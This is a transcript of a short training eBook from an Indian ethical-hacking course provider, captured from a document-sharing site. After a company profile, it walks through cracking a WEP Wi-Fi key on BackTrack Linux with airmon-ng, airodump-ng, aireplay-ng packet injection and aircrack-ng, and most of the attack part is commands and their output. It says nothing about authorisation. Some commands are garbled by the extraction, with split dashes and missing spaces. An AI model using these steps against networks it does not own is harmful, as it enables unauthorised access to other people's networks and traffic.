+ All Categories
Home > Documents > Seculabs eBook - WiFi WEP Cracking Without Dictionary

Seculabs eBook - WiFi WEP Cracking Without Dictionary

Date post: 14-Apr-2018
Category:
Upload: rifqi-multazam
View: 221 times
Download: 0 times
Share this document with a friend
14
7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 1/14
Transcript

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 1/14

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 2/14

 

SECUGENIUS SECURITY SOLUTIONS 

--------------------------------------------------------------------------------------

(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)

Company Profile:

Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student

Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS

are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius

Security Solutions are providing training in Information Security and various professional courses.

Secugenius Security Solutions is an organization which believes in inventing and implementing newideas to influence the technological minds of the youngsters

Looking at the number of Cyber Crimes since last many years, We at Secugenius Security

Solutions provides training on Ethical hacking & Cyber Security to students, IT Professionals, Bank 

Employees, Police officials.

Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the

benefit of the students & making them aware of the latest trends in technological era of the

Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the

nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime

Investigation & Forensic Sciences

Secugenius provides various security solutions to its clients by securing their websites from cyber

attacks. We provide training to college students, graduates and professionals in various fields.

Education is delivered to students through two modes i.e. Regular mode and Distance mode which

are available as short term and long term courses.

In the workshops conducted by Secugenius, participants can claim to be trained by the highly

experienced & skilled corporate trainers from different parts of the nation. We believe in making

the base of students to be as strong as possible. All the modules have been designed in order to

provide students with specialized knowledge by specialized trainers.

This library was furnished, managed and funded by the Founders and Directors of Secugenius

Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of 

the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security

Solutions.

This Online Digital Library has been initiated as a free resource & permanent

resource on specialization basis for every student of Team Secugenius.

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 3/14

 

Wi-Fi WEP Cracking Without Dictionary

Product ID No: SG/ODL/13002

Founder & Director: Harpreet Khattar & Kshitij Adhlakha

Resource Person: Chetan Soni

Secugenius Security Solutions 

SCO-13A, Model Town Extn, Near Krishna Mandir,

Ludhiana-141002, Punjab – India

[email protected][email protected] 

www.secugenius.com , www.seculabs.in 

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 4/14

 

Requirements:-

1.  Windows 2000/Xp/Seven/Vista/8/Linux Distro 

2.  Backtrack Linux Operating System (Live or ISO) 

3.  VMware Workstation (If you use an ISO File) 

4.  Wireless USB Adaptor (If you use VMware Workstation) 

Steps:-

First Start Backtrack Linux Operating system inside VMwareWorkstation named as BT-5-R3 Version.Some Basic Commands which is very helpful when you use Backtrack.

 Iwconfig

 Ifconfig

 pwd

 ls Startx

 Username – root and Password – toor (By Default in BT5)

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 5/14

 

Start Terminal and Type this Command and it shows,root@bt:~# iwconfig

Wlan0 

IEEE 802.11bgn ESSID:off/any Mode:Managed Access Point: Not Associated Tx-power=20 DbmRetry ong limit:7 RTS thr:off Fragment thr:off Encryption Key:off Power Management:off 

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 6/14

 

Now Type this Commandroot@bt:~# airmon-ng

Interface Chipset Driver wlan0 Atheros AR9271 ath9k – [phy0] 

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 7/14

 

Now Getting Start this Interface by typing this command in yourterminalroot@bt:~# airmon-ng start (interface) root@bt:~# airmon-ng start wlan0 

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 8/14

 

Now Further Start your Monitor mode by typing this commandroot@bt:~# airodump-ng (monitor mode) root@bt:~# airodump-ng mon0

When you type this command it shows many things:-a) BSSID(Base Service Set Identifier)  

b) PWR  

c)  Beacons  

d) #Data(Data Rate)  

e) #/s  

f)  CH(Channel ID)  

g) ENC(Encryption)  

h) Cipher(Security)  

i)   Auth(Authentication)  

 j)  ESSID(WiFi Name)  

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 9/14

 

Now Press ctrl+c (To stop the process) and type this command,

root@bt:~# airodump-ng -c (channel CH) -w ( your file name)--bssid (bssid)( mode) 

root@bt:~#  airodump-ng – 

c 11 – 

w cracking – 

bssid80:1F:02:02:6C:C4 mon0

Now don’t stop this process until the #data reaches above 50000. So

we need to wait until the #data rise until 50000, the more the data,the less time to crack 

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 10/14

 

Now The Last two lines shows that no. of users connected to thisNetwork, the more they browse/use, the more data will generateNow Type this Command:-root@bt:~# aireplay-ng -1 0 -a (bssid) (monitor mode) 

root@bt:~# aireplay-ng -1 0 – 

a 80:1F:02:02:6C:C4 mon0 

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 11/14

 

It will send the authentication request packets to routerNow Further Type this Command

root@bt:~ # aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b (bssid)

(monitor mode) 

root@bt:~#  aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b80:1F:02:02:6C:C4 mon0 

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 12/14

 

Now it displaysUse this packet? YES

Now, let see the #data. .it will increase rapidly. .so wait the #data untilit reach 50 000 ivs. .When it reaches above 50000 ivs then it looks like this,

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 13/14

 

 And the last step , type this command in your terminalroot@bt:~# aircrack-ng 2 filename-01.cap root@bt:~# aircrack-ng 2 cracking-01.cap

7/29/2019 Seculabs eBook - WiFi WEP Cracking Without Dictionary

http://slidepdf.com/reader/full/seculabs-ebook-wifi-wep-cracking-without-dictionary 14/14

 

It takes 1-2 Minutes, and at last it shows the result


Recommended